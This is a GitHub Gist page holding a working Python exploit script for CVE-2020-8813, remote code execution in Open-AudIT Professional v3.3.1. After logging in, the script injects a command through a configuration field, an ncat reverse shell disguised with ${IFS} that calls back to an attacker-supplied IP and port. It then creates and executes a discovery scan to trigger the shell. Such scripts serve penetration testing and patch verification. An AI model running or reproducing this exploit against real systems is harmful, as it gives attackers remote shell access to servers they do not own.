-
-
Save mhaskar/dca62d0f0facc13f6364b8ed88d5a7fd to your computer and use it in GitHub Desktop.
Open-AudIT Professional v3.3.1 Remote Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution | |
# Date: 22/04/2020 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE: CVE-2020-8813 | |
# Vendor Homepage: https://opmantek.com/ | |
# Version: v3.3.1 | |
# Tested on: Ubuntu 18.04 / PHP 7.2.24 | |
import requests | |
import sys | |
import warnings | |
import random | |
import string | |
from bs4 import BeautifulSoup | |
from urllib.parse import quote | |
warnings.filterwarnings("ignore", category=UserWarning, module='bs4') | |
if len(sys.argv) != 6: | |
print("[~] Usage : ./openaudit-exploit.py url username password ip port") | |
exit() | |
url = sys.argv[1] | |
username = sys.argv[2] | |
password = sys.argv[3] | |
ip = sys.argv[4] | |
port = sys.argv[5] | |
request = requests.session() | |
def inject_payload(): | |
configuration_path = url+"/en/omk/open-audit/configuration/90" | |
# data = "payload={'expt_name' : 'A60E001', 'status' : 'done' }" | |
data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port) | |
request.patch(configuration_path, data) | |
print("[+] Payload injected in settings") | |
def start_discovery(): | |
discovery_path = url+"/en/omk/open-audit/discoveries/create" | |
post_discovery_path = url+"/en/omk/open-audit/discoveries" | |
scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)]) | |
req = request.get(discovery_path) | |
response = req.text | |
soup = BeautifulSoup(response, "html5lib") | |
token = soup.findAll('input')[5].get("value") | |
buttons = soup.findAll("button") | |
headers = {"Referer" : discovery_path} | |
request_data = { | |
"data[attributes][name]":scan_name, | |
"data[attributes][other][subnet]":"10.10.10.1/24", | |
"data[attributes][other][ad_server]":"", | |
"data[attributes][other][ad_domain]":"", | |
"submit":"", | |
"data[type]":"discoveries", | |
"data[access_token]":token, | |
"data[attributes][complete]":"y", | |
"data[attributes][org_id]":"1", | |
"data[attributes][type]":"subnet", | |
"data[attributes][devices_assigned_to_org]":"", | |
"data[attributes][devices_assigned_to_location]":"", | |
"data[attributes][other][nmap][discovery_scan_option_id]":"1", | |
"data[attributes][other][nmap][ping]":"y", | |
"data[attributes][other][nmap][service_version]":"n", | |
"data[attributes][other][nmap][open|filtered]":"n", | |
"data[attributes][other][nmap][filtered]":"n", | |
"data[attributes][other][nmap][timing]":"4", | |
"data[attributes][other][nmap][nmap_tcp_ports]":"0", | |
"data[attributes][other][nmap][nmap_udp_ports]":"0", | |
"data[attributes][other][nmap][tcp_ports]":"22,135,62078", | |
"data[attributes][other][nmap][udp_ports]":"161", | |
"data[attributes][other][nmap][timeout]":"", | |
"data[attributes][other][nmap][exclude_tcp_ports]":"", | |
"data[attributes][other][nmap][exclude_udp_ports]":"", | |
"data[attributes][other][nmap][exclude_ip]":"", | |
"data[attributes][other][nmap][ssh_ports]":"22", | |
"data[attributes][other][match][match_dbus]":"", | |
"data[attributes][other][match][match_fqdn]":"", | |
"data[attributes][other][match][match_dns_fqdn]":"", | |
"data[attributes][other][match][match_dns_hostname]":"", | |
"data[attributes][other][match][match_hostname]":"", | |
"data[attributes][other][match][match_hostname_dbus]":"", | |
"data[attributes][other][match][match_hostname_serial]":"", | |
"data[attributes][other][match][match_hostname_uuid]":"", | |
"data[attributes][other][match][match_ip]":"", | |
"data[attributes][other][match][match_ip_no_data]":"", | |
"data[attributes][other][match][match_mac]":"", | |
"data[attributes][other][match][match_mac_vmware]":"", | |
"data[attributes][other][match][match_serial]":"", | |
"data[attributes][other][match][match_serial_type]":"", | |
"data[attributes][other][match][match_sysname]":"", | |
"data[attributes][other][match][match_sysname_serial]":"", | |
"data[attributes][other][match][match_uuid]":"" | |
} | |
print("[+] Creating discovery ..") | |
req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False) | |
disocvery_url = url + req.headers['Location'] + "/execute" | |
print("[+] Triggering payload ..") | |
print("[+] Check your nc ;)") | |
request.get(disocvery_url) | |
def login(): | |
login_info = { | |
"redirect_url": "/en/omk/open-audit", | |
"username": username, | |
"password": password | |
} | |
login_request = request.post(url+"/en/omk/open-audit/login", login_info) | |
login_text = login_request.text | |
if "There was an error authenticating" in login_text: | |
return False | |
else: | |
return True | |
if login(): | |
print("[+] LoggedIn Successfully") | |
inject_payload() | |
start_discovery() | |
else: | |
print("[-] Cannot login!") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment